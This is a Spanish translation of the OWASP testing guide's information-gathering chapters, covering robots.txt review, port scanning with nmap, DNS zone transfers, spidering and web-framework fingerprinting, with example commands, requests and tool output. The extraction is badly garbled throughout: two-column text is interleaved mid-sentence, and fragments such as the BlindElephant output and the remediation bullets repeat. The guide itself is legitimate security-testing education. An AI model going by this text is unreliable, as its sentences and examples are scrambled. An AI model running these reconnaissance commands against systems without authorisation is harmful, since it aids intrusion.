servidor web utilizado, tiempo de actividad del servidor, propietario Netblock, endurecido.
historial de cambios relacionados con el servidor web y el sistema operativo.
A continuación se muestra un ejemplo: Ofusque la capa de presentación de los encabezados del servidor web.
• Apache
• IIS
Objetivos de la prueba
Se espera que el proyecto OWASP Unmaskme se convierta en otra
herramienta en línea para dejar huellas digitales de cualquier sitio web con 1. Fuga de información de la ruta o rutas al directorio o carpeta de la aplicación
una interpretación global de todos los metadatos web extraídos. La idea detrás web.
de este proyecto es que cualquier persona a cargo de un sitio web pueda
probar los metadatos que el sitio muestra al mundo y evaluar desde un punto 2. Crear la lista de directorios que deben ser evitados por las arañas, robots o
de vista de seguridad. rastreadores.
Aunque este proyecto está aún en desarrollo, usted puede probar el concepto
de esta idea en español.
Cómo se prueba
robots.txt
Referencias
Libros Blancos Las arañas, robots o rastreadores web recuperan una página web y luego,
recursivamente, atraviesan hipervínculos para recuperar otros contenidos web. Su
• Saumil Shah: “An Introduction to HTTP fingerprinting” comportamiento aceptado está especificado por el protocolo de Exclusión de
Robots del archivo robots.txt en el directorio web principal [1]
www.net-square.com
Como ejemplo, el principio del archivo robots.txt de
http://www.google.com/robots.txt probado el 11 de agosto de 2013 se cita a
continuación:
• Anant Shrivastava: “Web Application Finger Printing”
anantshri.info
Remediación
Disallow: /groups
Disallow: /images
cmlh$ curl -O http://www.google.com/robots.txt
Disallow: /catalogs
% Total % Received % Xferd Average Speed Time Time
Time Current
Disallow: /sdch
robots.txt in el directorio principal con “wget” o “curl”
Disallow: /groups
Disallow: /images
3. Sending Allow: URIs of www.google.com to web proxy i.e. <META>Etiquetas - con Burp
127.0.0.1:8080
/catalogs/about sent
Basado en las directivas, de no permitir (Disallow), listadas en el archivo robots.txt
/catalogs/p? sent en el directorio principal, la búsqueda normal de una expresión " <META
name="”ROBOTS””" dentro de cada página web inicia y el resultado se compara
/news/directory sent
al archivo robots.txt en el directorio principal.
...
Herramientas
Los profesionales en seguridad a veces reciben un conjunto de direcciones IP como
• Buscador (Funcion de Ver Origen) un objetivo de pruebas. Es discutible que este escenario sea parecido a una relación
de tipo prueba de penetración, pero, en cualquier caso, se espera que dicha sesión
• curl pondría a prueba todas las aplicaciones web accesibles a través de este objetivo. El
problema es que la dirección IP aloja un servicio HTTP en el puerto 80, pero si un
• wget evaluador debe acceder especificando la dirección IP (que es todo lo que sabe)
reportará "Ningún servidor web configurado en esta dirección" o un mensaje
• rockspider[7] similar. Pero el sistema puede "ocultar" una serie de aplicaciones web, asociadas a
nombres simbólicos, sin relación del (DNS). Obviamente, el alcance del análisis se
ve afectado profundamente si el evaluador prueba todas las aplicaciones o sólo las
aplicaciones de las que está consciente.
Referencias
Libros Blancos
A veces, la especificación de destino es más rica. El evaluador puede recibir una
lista de direcciones IP y sus correspondientes nombres simbólicos. Sin embargo,
esta lista podría transmitir información parcial, es decir, podría omitir algunos
[1] “The Web Robots Pages” - http://www.robotstxt.org/ nombres simbólicos y el cliente podría ni siquiera estar consciente de aquello (esto
es más probable que ocurra en las grandes organizaciones).
[2] “Block and Remove Pages Using a robots.txt File” -
https://support.google.com/webmasters/answer/156449
[3] “(ISC)2 Blog: The Attack of the Spiders from the Clouds” - Otros temas que afectan el alcance de la evaluación están representados por
http://blog.isc2.org/isc2_blog/2008/07/the-attack-of-t.html aplicaciones web publicadas en URLs no evidentes (por ejemplo,
http://www.example.com/some-strange-URL), a las que no se hace referencia en
[4] “Telstra customer database exposed” - http://www.smh.com.au/it-pro/security- otros lugares. Esto puede suceder por error (debido a configuraciones incorrectas) o
it/telstra-customer-database-exposed-20111209-1on60.html intencionalmente (por ejemplo, interfaces administrativas no publicitadas).
Enumerar las aplicaciones que existen dentro del ámbito en un servidor web evaluador sepa explícitamente cómo llegar a ellas, es decir, el evaluador sabe las
url1 y url2 url3. Generalmente no hay necesidad de publicar aplicaciones web de
esta manera, a menos que el propietario no desee que se encuentren accesibles de
una manera estándar y esté dispuesto a informar a los usuarios sobre su ubicación
Cómo probar exacta. Esto no quiere decir que estas aplicaciones son secretas, sólo que su
existencia y localización no son anunciadas explícitamente.
Pruebas de Caja Negra
Las DNS permiten una dirección IP única asociada a uno o más nombres
simbólicos. Por ejemplo, la dirección IP 192.168.1.100 podría asociarse a los
Nota: Algunas de las técnicas siguientes se aplican a servidores de nombres DNS www.example.com, helpdesk.example.com y
webmail.example.com. No es necesario que todos los nombres pertenezcan al
mismo dominio DNS. Esta relación de 1 a N puede usarse para servir a diferentes
contenidos con los denominados hospedajes (host) virtuales. La información que
conexión a internet, es decir, DNS y servicios de búsqueda en la web de IP inversa especifica al host virtual al cual nos estamos refiriendo está incrustada en el
y el uso de motores de búsqueda. Los ejemplos hacen uso de la direcciones IP encabezado HTTP 1.1 [1].
privadas (por ejemplo 192.168.1.100), que, a menos que se indique lo contrario,
representan direcciones IP genéricas y son utilizadas solamente con el propósito del
anonimato.
Uno no podría sospechar de la existencia de otras aplicaciones web adicionales a la
obvia www.example.com, a menos que sepan de helpdesk.example.com y
webmail.example.com.
Hay tres factores que influyen en cuantas aplicaciones están relacionadas con un
determinado nombre DNS (o una dirección IP):
1. URL con bases diferentes No hay ninguna manera de comprobar totalmente la existencia de aplicaciones web
sin el nombre estándar. Al ser no estándar, no hay criterios establecidos o
El punto de entrada obvio de una aplicación web es www.example.com, es decir, convenidos para la nomenclatura, sin embargo, hay una serie de técnicas que puede
con esta nominación abreviada pensamos que la aplicación web se origina en utilizar el evaluador para obtener información adicional.
http://www.example.com/ (lo mismo se aplica para https). Sin embargo, a pesar de
que esta es la situación más común, no hay nada que obligue a la aplicación para
que empiece en "/".
En primer lugar, si el servidor web está mal configurado y permite navegar por el
directorio, es posible detectar estas aplicaciones. Los escáneres de vulnerabilidad
pueden ayudar en este sentido.
Por ejemplo, el mismo nombre simbólico puede ser asociado a tres aplicaciones
web tales como: http://www.example.com/url1 http://www.example.com/url2
http://www.example.com/url3
En segundo lugar, estas aplicaciones pueden estar referenciadas por otras páginas
En este caso, el enlace http://www.example.com/ no estaría asociado con una web y hay la posibilidad de que hayan sido procesadas por un robot araña e
página significativa, y las tres aplicaciones estarían "ocultas", a menos que el indexadas por los motores de búsqueda web. Si los evaluadores sospechan de la
existencia de este tipo de aplicaciones "ocultas" en www.example.com lo podrían De este ejemplo uno puede ver que:
buscar utilizando el operador del sitio web y examinar el resultado de una consulta
para "site: www.example.com". Entre los URLs devueltos podrían haber algunos
apuntando a una aplicación no tan obvia.
• Hay un servidor de http Apache corriendo en el puerto 80.
• Parece que hay un servidor https en el puerto 443 (pero esto debe ser confirmado,
Otra opción es sondear URL que podrían ser candidatos probables para por ejemplo, visitando https://192.168.1.100 con un navegador)
aplicaciones no publicadas. Por ejemplo, un correo web frontal puede ser accesible
desde la URL https://www.example.com/webmail, https://webmail.example.com/ o • En el puerto 901hay una interfaz de web de Samba SWAT.
https://mail.example.com/. Lo mismo se aplica para interfaces administrativas, que
pueden ser publicadas en URL ocultas (por ejemplo, una interfaz administrativa • El servicio en Puerto 1241 no es https, pero es el demonio Nessus enlazado al
Tomcat) y, sin embargo, no hacen referencia en ningún lugar. Así que haciendo un SSL.
poco de búsqueda de estilo diccionario (o "adivinanza inteligente") podría arrojar
algunos resultados. Los escáneres de vulnerabilidad pueden ayudar en este caso. • El puerto 3690 ofrece un servicio no especificado (nmap devuelve su huella
digital - aquí ha sido omitida por claridad - junto a las instrucciones para su
incorporación en la base de datos de huellas dactilares nmap, siempre y cuando
usted sepa qué servicio representa).
Enfoques para solucionar el tema 2 - puertos no estándar
• Otro servicio no identificado en el puerto 8000. Esto posiblemente podría ser un
Es fácil comprobar la existencia de aplicaciones web en puertos no estándar. Un http, ya que no es raro encontrar servidores de http en este puerto. Vamos a
escáner de puertos como nmap [2] es capaz de realizar el reconocimiento de examinar esta cuestión:
servicio mediante la opción - sV e identificará los servicios http [s] en puertos
arbitrarios. Lo que se requiere es un análisis completo de los 64k de espacio del
puerto TCP.
Puertos interesantes en 192.168.1.100:
(Los 65527 puertos escaneados, pero que no se muestran abajo, son los
Por ejemplo, el siguiente comando buscará, con un escaner de conección TCP,
que están en estado cerrado)
todos los puertos abiertos en la IP 192.168.1.100 y tratará de determinar qué
servicios están atados a ellos (sólo se muestran los modificadores esenciales –
PORT STATE SERVICE VERSION
nmap ofrece un amplio conjunto de opciones, cuya discusión está fuera de
alcance): 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
nmap –PN –sT –sV –p0-65535 192.168.1.100 443/tcp open ssl OpenSSL
populares o interfaces web que, de lo contrario, podrían pasar desapercibidas (por www.example.com y el no tan obvio helpdesk.example.com y
ejemplo, una interfaz de administración de Tomcat). webmail.example.com (y probablemente otros). Revise todos los nombres
devueltos por la transferencia de zona y considere a todos aquellos que se
relacionan con el objetivo a ser evaluado.
Hay una serie de técnicas que pueden utilizarse para identificar nombres DNS Tratando de solicitar una transferencia de zona para owasp.org desde uno de los
asociados a una dirección IP determinada x.y.z.t. nombres de servidor:
Servicios de IP inversa
Los servicios de IP inversa son similares a las consultas inversas de DNS, con la
Una transferencia de zona puede solicitarse ahora a los nombres de los servidores diferencia que los evaluadores consultan una aplicación web en lugar de un nombre
para el dominio example.com. Si el evaluador es afortunado, recibirá una lista de de servidor. Hay una cantidad de servicios disponibles. Ya que tienden a devolver
las entradas DNS de este dominio. Esto incluirá el obvio resultados parciales (y a menudo diferentes), es mejor utilizar varios servicios para
obtener un análisis más exhaustivo.
(syntax: http://whois.webhosting.info/x.x.x.x)
Googlear
Herramientas
• Herramientas de búsqueda DNS como nslookup, dig y similares.
• Nmap - insecure.org
...
• Nessus Vulnerability Scanner - nessus.org
• Nikto - cirt.net
<div class=”table2”>
<!-- uery: SELECT id, name FROM app.users WHERE active=’1’ -->
Revise los comentarios y metadatos de la página web para entender mejor la • “loose.dtd” -- loose DTD
aplicación y encontrar cualquier fuga de información.
• “frameset.dtd” -- DTD for frameset documents
Cómo probar Los comentarios HTML son utilizados por los desarrolladores para
incluir información sobre la depuración de la aplicación. A veces se olvidan de los Algunas Metaetiquetas no proveen vectores de ataque activos, sino más bien
comentarios y se quedan en la producción. Los evaluadores deben busquar permiten a un atacante hacer un perfil de la aplicación
comentarios en HTML que comienzan con "".
Y
Herramientas
• Wget
<META http-equiv=”Cache-Control” content=”no-cache”>
• Browser “view source” function
• Eyeballs
Resultará en
• Curl
Cache-Control: no-cache
Referencias
Pruebe para ver si esto puede utilizarse para llevar a cabo ataques de inyección (por
ejemplo ataques CRLF). También puede ayudar a determinar el nivel de fuga de Libros Blancos
datos a través de la caché del navegador.
[1] HTML version 4.01: w3.org
Una Meta etiqueta común (pero no obediente en WCAG) es la actualización.
[2] XHTML (for small devices): w3.org
<META http-equiv=”Refresh”
[3] HTML version 5 : w3.org
content=”15;URL=https://www.owasp.org/index.html”>
GMT”>
<META name=”keywords” lang=”en-us” content=”OWASP, security, Enumerar la aplicación y su superficie de ataque es un precursor clave antes que
sunshine, lollipops”> cualquier prueba de fondo puede llevarse a cabo, ya que
GMT”>
Entender cómo se forman las solicitudes y las respuestas típicas de la aplicación. Una vez que ha mapeado cada área de la aplicación, puede ir a través de la
aplicación y probar cada una de las áreas que ha identificado y tomar notas de lo
que funcionó y lo que no funcionó. El resto de esta guía identificará cómo se
prueba cada una de estas áreas de interés, pero esta sección debe realizarse antes
Cómo probar de que la prueba real pueda comenzar.
Note que para ver los parámetros enviados en una petición POST, el Solicitudes:
evaluador tendrá que utilizar una herramienta como un interceptador de proxy
(por ejemplo, el OWASP: Zed Attack Proxy (ZAP)) o un complemento del
navegador. Dentro de la solicitud POST, el evaluador debe también poner
atención especial a cualquier campo oculto que se esté pasando a la • Identificar dónde se utilizan peticiones GET y POST.
aplicación, ya que estos generalmente contienen información confidencial,
como información sobre el estado, cantidad de artículos o el precio de los • Identificar todos los parámetros en las peticiones POST (estos son en el cuerpo
artículos que el desarrollador nunca quiso que usted pudiera ver o cambiar. de la solicitud)
• Identifique todos los parámetros utilizados en una petición GET (es decir, la
Adicionalmente, en este punto, el evaluador normalmente atrapa cada URL), en particular la cadena de consulta (generalmente después de un signo ?).
solicitud y respuesta para que él pueda ver exactamente cada encabezado,
parámetro, etc., que pasa a la aplicación y lo que devuelve. Esto puede ser • Identifique todos los parámetros de la cadena de consulta. Estos generalmente
bastante tedioso a veces, especialmente para sitios grandes e interactivos están en pares, como foo = bar. También tenga en cuenta que muchos de los
bancaria). Sin embargo, la experiencia le
(piense en una aplicación parámetros pueden estar en una cadena de consulta separados por un &, ~,:, o
cualquier otro carácter especial o codificación.
dirá al evaluador qué es lo que debe buscar y el tiempo
utilizado durante esta fase puede reducirse significativamente.
Respuestas: EJEMPLO 2
En este ejemplo se muestra una solicitud POST que debería conectarle a una
aplicación.
• Identifique dónde se establecen nuevas cookies (encabezado Set-Cookie),
modifican o añaden.
POST https://x.x.x.x/KevinNotSoGoodApp/authenticate.asp?-
• Identifique dónde hay redireccionamientos (estado de código 3xx HTTP)
códigos de estado 400, en especial 403 Prohibido (Forbiden) y 500 errores de service=login
servidor interno (internal server errors) durante las respuestas normales (es
Host: x.x.x.x
decir, sin modificar solicitudes).
Cookie:
• También note dónde se utiliza cualquier encabezado interesante. Por ejemplo,
SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIH
"Server: BIG-IP" indica que el sitio tiene su carga equilibrada. Aunque si un
ByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIz
sitio tiene su carga equilibrada y un servidor está configurado incorrectamente,
NA==
entonces el evaluador podría tener que hacer varias solicitudes para acceder al
servidor vulnerable, dependiendo del tipo de equilibrio de carga usado.
CustomCookie=00my00trusted00ip00is00x.x.x.x00
Result Expected:
EJEMPLO 1
En este ejemplo el evaluador debe anotar todos los parámetros como lo hizo
Este ejemplo muestra una solicitud GET que debería adquirir un elemento de antes, pero observe que los parámetros se pasan en el cuerpo del mensaje y no en
una aplicación de compras en línea. la URL. Además, tenga en cuenta que hay una cookie personalizada que está
siendo utilizada.
GET
https://x.x.x.x/shoppingApp/buyme.asp?CUSTOMERID=100&ITEM= Pruebas de Caja Gris
z101a&PRICE=62.50&IP=x.x.x.x
Probar en busca de puntos de entrada de la aplicación a través de una
Host: x.x.x.x metodología de Caja Gris consistiría en todo lo ya identificado anteriormente
con una adición. En los casos donde hay fuentes externas de las que la aplicación
Cookie: recibe datos y los procesa (tales como trampas SNMP, mensajes syslog,
SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIG
mensajes SMTP o SOAP de otros servidores) una reunión con los
ZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy
desarrolladores de la aplicación podría identificar las funciones que aceptan o
esperan el ingreso de datos del usuario y cómo están formateados. Por ejemplo,
el desarrollador podría ayudar a entender cómo formular una petición SOAP
correcta que aceptaría la aplicación y dónde reside el servicio web (si el servicio
web o cualquier otra función no ha sido identificada durante las pruebas de Caja
Negra).
Result Expected:
Aquí el evaluador debe anotar todos los parámetros de la petición tales como
CUSTOMERID, ITEM, PRICE, IP y las cookies (que podrían ser sólo Herramientas
parámetros codificados o utilizadas para el estado de sesión).
Proxy de intercepción:
• OWASP: Zed Attack Proxy (ZAP) Hay varias maneras de acercarse a las pruebas y a la medición de la cobertura del
código:
• OWASP: WebScarab
• Burp Suite
• Ruta - Pruebe cada uno de los caminos a través de una aplicación que incluye
• CAT combinatoria y análisis de valores límite para cada ruta de decisión. Aunque este
enfoque ofrece rigor, la cantidad de rutas comprobables crece exponencialmente
con cada rama de decisión.
Accesorios de motores de búsqueda: • Flujo de Datos (o análisis de la mancha) - prueba la asignación de variables a
través de la interacción externa (normalmente los usuarios). Se centra en crear
• TamperIE for Internet Explorer mapas del flujo, transformación y uso de datos a través de una aplicación.
• Tamper Data for Firefox • Carrera - prueba varias instancias simultáneas de la aplicación manipulando los
mismos datos.
Referencias
El acuerdo en cuanto a qué método se utiliza y en qué medida se utiliza cada
Libros Blancos método debe ser negociado con el dueño de la aplicación. Enfoques más simples
podrían también adoptarse, incluyendo el preguntarle al dueño de la aplicación
las funciones o secciones del código por las que están particularmente
preocupados y cómo llegar a esos segmentos de código.
• RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 -
tools.ietf.org
Pruebas de Caja Negra
Ejemplo
Cómo probar
Spidering automático
En las pruebas de Caja Negra es extremadamente difícil probar todo el código
base. No sólo porque el evaluador no tiene ninguna vista de las rutas de código a Los robots araña automáticos son una herramienta utilizada para descubrir
través de la aplicación, e incluso si lo hicieran, probar todas las rutas del código automáticamente nuevos recursos (URL) en un sitio web en
tomaría mucho tiempo. Una manera de reconciliar esto es documentar qué rutas
del código fueron descubiertas y probadas.
particular. Comienza con una lista de URL a visitar, llamadas semillas, que [1] en.wikipedia.org
dependen de cómo se inicia el robot araña. Si bien hay un montón de
herramientas de Spidering, en el ejemplo siguiente se utiliza el Zed Attack Proxy
(ZAP):
• Sitio de Robot Araña - la lista de semillas contiene todas las URL existentes ya
encontradas en el sitio seleccionado.
prueba. Dicha información puede ser derivada de un cuidadoso análisis
• Subárbol de Robot araña - la lista de semillas contiene todas las URL existentes
ya encontradas y presentes en el subárbol del nodo seleccionado.
de ciertos lugares comunes. La mayoría de los frameworks web tienen varios
• URL de robot Araña - la lista de semillas contiene sólo la URL correspondiente
marcadores en esos lugares, lo que ayuda a un atacante a detectarlos. Esto es
al nodo seleccionado (en el árbol de sitio).
básicamente lo que todas las herramientas automáticas hacen: buscar un
marcador desde una ubicación predefinida y luego compararlo con la base de
• Vista completa de Robot Araña - la lista de semillas contiene todas las URL
datos de firmas conocidas. Para mayor precisión se utilizan, generalmente,
que el usuario ha seleccionado como 'A la vista'.
varios marcadores.
Herramientas
[*] Tenga en cuenta que este artículo no hace ninguna diferenciación entre
Frameworks de aplicación Web (WAF) y sistemas de gestión de contenidos
• Zed Attack Proxy (ZAP)
(CMS). Esto se ha hecho para que sea conveniente marcar con huellas
digitales ambos casos en un solo capítulo. Además, se hace referencia a ambas
• Spreadsheet software
categorías como frameworks web.
• Diagramming software
Objetivos de la prueba
Referencias
El tipo de framework web usado, asi como tener una mejor comprensión de la
metodología de pruebas de seguridad.
Libros Blancos
sitio web pueda ofuscar los encabezados HTTP (ver un ejemplo en el capítulo
#Remediación).
Cómo probar
• Encabezados HTTP
• Cookies
HTTP/1.1 200 OK
• Códigos fuente HTML
Server: nginx/1.0.14
• Carpetas y documentos específicos
Date: Sat, 07 Sep 2013 08:19:15 GMT
Content-Type: text/html;charset=ISO-8859-1
Encabezados HTTP
Connection: close
La forma básica de identificación de un framework web es mirar el campo X-
Powered-By en el encabezado de respuesta HTTP. Muchas herramientas Vary: Accept-Encoding
pueden utilizarse para marcar una huella digital. La más simple es la utilidad
netcat. X-Powered-By: Blood, sweat and tears
HTTP/1.1 200 OK
Server: nginx/1.0.14
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Server: nginx/1.4.1
Cookies
Sin embargo, estos cambios son menos comunes que cambiar el encabezado
Otra manera similar pero más confiable de determinar el framework web
X-Powered-By, por lo que este enfoque puede ser considerado como más
actual es determinar el framework de cookies específicas.
confiable.
Considere la siguiente solicitud HTTP:
Host: defcon-moscow.org Esta técnica se basa en la búsqueda de ciertos patrones en el código fuente de
la página HTML. A menudo se puede encontrar una gran cantidad de
User-Agent: Mozilla75.0 |Macintosh; Intel Mac OS X 10.7; rv: información que ayuda a un evaluador a reconocer un framework específico
22. 0) Gecko/20100101 Firefox/22 . 0 de la web. Uno de los marcadores comunes son comentarios HTML que
conducen directamente a la divulgación del framework. Más a menudo, ciertas
Accept: text/html, application/xhtml + xml, application/xml; q=0.9,
*/*; q=0 , 8 rutas específicas del framework pueden encontrarse, es decir, frameworks css
y/o carpetas js específicos. Finalmente, las variables de secuencia de
Accept - Language: ru-ru, ru; q=0.8, en-us; q=0.5 , en; q=0 . 3 comandos (script) específicas podrían también apuntar a un cierto framework.
Con mayor frecuencia, dicha información se coloca entre etiquetas Actualmente, es una de las mejores herramientas de huellas digitales en el
<head></head> en etiquetas <meta> o al final de la página. mercado. Incluidas por defecto en construcciones Kali Linux. Idioma: Ruby
Matches para toma de huellas digitales se hacen con:
• reconocimiento de URL
BlindElephant
Archivos y carpetas específicos
Los archivos y carpetas específicos son diferentes en cada framework Página Web: community.qualys.com
específico. Se recomienda instalar el correspondiente framework durante las
pruebas de penetración para tener mejor entendimiento de qué infraestructura Esta magnífica herramienta funciona mediante el principio de
se presenta y qué archivos pueden quedar en el servidor. Sin embargo, ya checksum (suma de comprobación) de archivos estáticos
existen varias listas de archivo buenas y un buen ejemplo es FuzzDB listas de
basados en la diferencia de la versión que proporciona así una
archivos y carpetas predecibles (code.google.com).
alta calidad de huellas digitales. Idioma:Python
Herramientas
Muestra de respuesta de una huella digital exitosa:
Una lista de herramientas generales y muy conocidas se presenta a
continuación. También hay un sinfín de otras utilidades, así como
herramientas de huellas digitales basadas en frameworks.
WhatWeb:
Loaded /Library/Python/2.7/site-
packages/blindelephant/dbs/drupal.pkl with 145 versions, 478
differentiating paths, and 434 version groups.
cargar la página en el navegador. Funciona totalmente a nivel de navegador y
Starting BlindElephant fingerprint for version of drupal at da resultados en forma de iconos. Aunque a veces tiene falsos positivos, esto
http://my_target es muy útil para tener una noción de qué tecnologías fueron utilizadas para
construir el sitio web de destino inmediatamente después de navegar por una
página.
Hit http://my_target/CHANGELOG.txt
Hit http://my_target/INSTALL.txt
Hit http://my_target/misc/drupal.js
Hit http://my_target/MAINTAINERS.txt
Referencias
Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, • Saumil Shah: “An Introduction to HTTP fingerprinting” -
7.10, 7.11, 7.12, 7.13, 7.14
net-square.com
...
Remediación
Se recomienda reemplazar los nombres de las cookies al hacer cambios en los Sin embargo, estas no son las únicas maneras de restringir el acceso. Con el
archivos de configuración correspondientes. fin de automatizar este proceso, existen ciertos accesorios (plugins)
específicos del framework. Un ejemplo para WordPress es StealthLogin:
wordpress.org.
Código fuente HTML
Guías generales:
Guías generales:
• Asegúrese de que no hay marcadores visuales que revelen el framework. El propósito de este enfoque es vencer los escaneos basados en checksum (la
suma de comprobación) y no permitirles revelar archivos por sus hashes. En
• uite todos los comentarios innecesarios (derechos de autor, información de general, existen dos enfoques en la gestión de checksum:
errores, comentarios específicos del framework).
• Utilice los archivos css o js propios de la empresa y no los almacene • Modificar el contenido - incluso una ligera modificación resulta en una suma
de hash completamente diferente, así que añadir un solo byte en el final del
archivo no debe ser un gran problema.
Guias generales:
Resumen
GET / HTTP/1.1
No hay nada nuevo bajo el sol, y casi cada aplicación web que se puede
pensar en desarrollar ya ha sido desarrollada. Con la gran cantidad de User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0)
proyectos de software libre y de código abierto que son desarrollados y Gecko/20100101 Firefox/31.0
desplegados activamente alrededor del mundo, es muy probable que una
prueba de seguridad enfrentará un sitio objetivo que es total o parcialmente Accept:
dependiente de una de estas aplicaciones muy conocidas (por ejemplo, text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Wordpress, phpBB, Mediawiki, etc.). Conocer los componentes de las
Accept-Language: en-US,en;q=0.5
aplicaciones web que se están probando ayuda significativamente en el
proceso de prueba y se reduce drásticamente
‘’’Cookie: wp-settings-time-1=1406093286; wp-settings-time-
2=1405988284’’’
el esfuerzo requerido durante la prueba. Estas aplicaciones web conocidas
tienen encabezados HTML, cookies y estructuras de directorios que se pueden
DNT: 1
enumerar para identificar la aplicación.
Connection: keep-alive
Host: blog.owasp.org
Objetivos de la prueba
Podemos ver que para algunas carpetas de WordPress-específicas (por Identificadores de aplicación común
ejemplo, WP-includes, /wp-admin / y wp-content/) las respuestas HTTP son
403 (prohibido), 302 (encontrado, redirección a wp-login.php) y 200 (OK), Cookies
respectivamente. Este es un buen indicador de que el objetivo es alimentado
por WordPress. Es posible usar dirbust en diferentes carpetas de aplicaciones
plugin y sus versiones. En la imagen siguiente puede ver un archivo
CHANGELOG, típico de un plugin Drupal, que proporciona información
sobre la aplicación que está siendo usada y revela una versión del plugin
vulnerable.
• Expresiones regulares
• MD5 hashes
• Reconocimiento de URL
BlindElephant
WhatWeb:
Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl
with 145 versions, 478 differentiating paths, and 434 version groups.
Hit http://my_target/CHANGELOG.txt
Hit http://my_target/INSTALL.txt
Hit http://my_target/misc/drupal.js
File produced no match. Error: Retrieved file doesn’t match known Libros Blancos
fingerprint. 36b740941a19912f3fdbfcca7caa08ca
Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9,
7.10, 7.11, 7.12, 7.13, 7.14
• Anant Shrivastava : “Web Application Finger Printing” - anantshri.info
...
Remediación
Fingerprinting resulted in:
El consejo general es usar varias de las herramientas descritas anteriormente y
verificar los registros para entender exactamente lo que ayuda a un atacante a
Wappalyzer
revelar el framework web. Mediante la realización de múltiples análisis
Página web: http://wappalyzer.com después de que se han hecho cambios para ocultar las rutas del framework, es
posible alcanzar un mejor nivel de seguridad y asegurarse de que el
Wapplyzer es un plugin de Firefox Chrome. Sólo funciona en coincidencias framework no puede ser detectado por análisis automáticos. A continuación se
de expresiones regulares y no necesita otra cosa que cargar la página en el presentan algunas recomendaciones específicas, de acuerdo a la ubicación del
navegador. Funciona totalmente a nivel de marcador del framework y algunos enfoques adicionales interesantes.
navegador y da resultados en forma de iconos. Aunque a veces tiene falsos Encabezados HTTP
positivos, esto es muy útil para tener una noción de qué tecnologías fueron
Compruebe la configuración y desactive u ofusque todos los encabezados • Restrinja el acceso a otros archivos para lograr respuestas 404 al acceder a
HTTP que divulgan información de las tecnologías utilizadas. Aquí hay un ellos desde fuera. Esto puede hacerse, por ejemplo, modificando el archivo
artículo interesante sobre ofuscación de encabezados HTTP con Netscaler: htaccess y agregando RewriteCond o RewriteRule allí. A continuación se
grahamhosking.blogspot.ru presenta un ejemplo de tal restricción para dos carpetas comunes de
WordPress.
Sin embargo, estas no son las únicas maneras de restringir el acceso. Con el
fin de automatizar este proceso, existen ciertos accesorios (plugins)
específicos del framework. Un ejemplo para WordPress es StealthLogin:
Código fuente HTML
wordpress.org.
Compruebe manualmente el contenido del código HTML y elimine todo lo
que explícitamente señala el framework.
Enfoques adicionales
• Asegúrese de que no hay marcadores visuales que revelen el framework. El propósito de este enfoque es vencer a los escaneos basados en checksum (la
suma de comprobación) y no permitirles revelar archivos por sus hashes. En
• uite todos los comentarios innecesarios (derechos de autor, información de general, existen dos enfoques en la gestión de checksum:
errores, comentarios específicos del framework).
Archivos y carpetas especificas atacante. ¡Pero tenga cuidado de no sobreescribir las carpetas
y archivos existentes o romper el framework actual!.
Guias generales:
• Elimine del servidor todos los archivos innecesarios o sin uso. Esto implica Cree un mapa de la arquitectura de la
archivos de texto que revelen información sobre las versiones y la instalación
también.
aplicación (OTG-INFO-010)
Resumen
La complejidad de la infraestructura de servidores web interconectados y mediante otras pruebas y deriva los diferentes elementos, cuestiona esta suposición y
heterogéneos puede incluir cientos de aplicaciones web y hace de la gestión de amplia el mapa de arquitectura. El evaluador comenzará haciendo preguntas simples
configuración y de la revisión un paso fundamental en la prueba e como: "¿existe un sistema firewalling que protege al servidor web?". Esta pregunta
implementación de cada aplicación. De hecho, se necesita sólo una se responderá a partir de los resultados del análisis de red orientada hacia el servidor
vulnerabilidad para socavar la seguridad de toda la infraestructura, e incluso web y el análisis de si los puertos de red del servidor web se están filtrando en el
problemas pequeños y sin importancia aparente pueden convertirse en serios límite de la red (no se recíbe ninguna respuesta o se reciben mensajes de ICMP
riesgos para otra aplicación en el mismo servidor. inalcanzables) o si el servidor está conectado directamente a Internet (es decir,
devuelve paquetes RST para todos los puertos de no audio). Este análisis puede ser
mejorado para determinar el tipo de firewall utilizado, basado en pruebas de
paquetes de red. ¿Es el firewall una aplicación de estado completo o es un filtro de
Para abordar estos problemas, es de suma importancia llevar a cabo lista de acceso en un ruteador? ¿Cómo está configurado? ¿Puede evitarse?
una profunda revisión de la configuración y problemas de seguridad Detectar a un proxy inverso delante de un servidor web debe hacerse por el análisis
conocidos. Antes de realizar un examen a fondo es necesario crear un mapa de del banner del servidor web, que podría revelar directamente la existencia de un
la red y de la arquitectura de la aplicación. Los diferentes elementos que proxy inverso (por ejemplo, si se devuelve 'WebSEAL'[1]). También puede ser
conforman la infraestructura necesitan ser determinados para entender cómo determinado mediante la obtención de las respuestas dadas por el servidor web a las
interactúan con una aplicación web y cómo ellos afectan a la seguridad. peticiones y comparándolas con las respuestas esperadas. Por ejemplo, algunos
proxys inversos actúan como "sistemas de prevención de intrusiones" (o escudos
web) bloqueando ataques conocidos dirigidos al servidor web. Si se sabe que el
servidor web responde con un mensaje 404 a una petición que se dirige a una página
que no está disponible y devuelve un mensaje de error diferente para algunos ataques
web comunes como los realizados por escáneres CGI, podría ser una indicación de
Cómo probar que existe un proxy inverso (o un firewall de nivel de aplicación) que está filtrando
las solicitudes y devuelve una página de error diferente a lo que se espera. Otro
Cree un mapa de la arquitectura de la aplicación ejemplo: Si el servidor web devuelve un
Se debe crear el mapa de la arquitectura de la aplicación mediante algunas conjunto de métodos HTTP disponibles (incluyendo TRACE) pero los métodos
pruebas para determinar qué componentes se usan para construir la aplicación esperados devuelven errores, entonces es probable que haya un bloqueo entre ellos.
web. En instalaciones pequeñas, una sencilla aplicación basada en CGI podría
utilizar un solo servidor para que corra el servidor web que ejecuta la
aplicación C, Perl o Shell CGIs y quizás también el mecanismo de
autenticación. En algunos casos, incluso el sistema de protección se entrega a sí mismo:
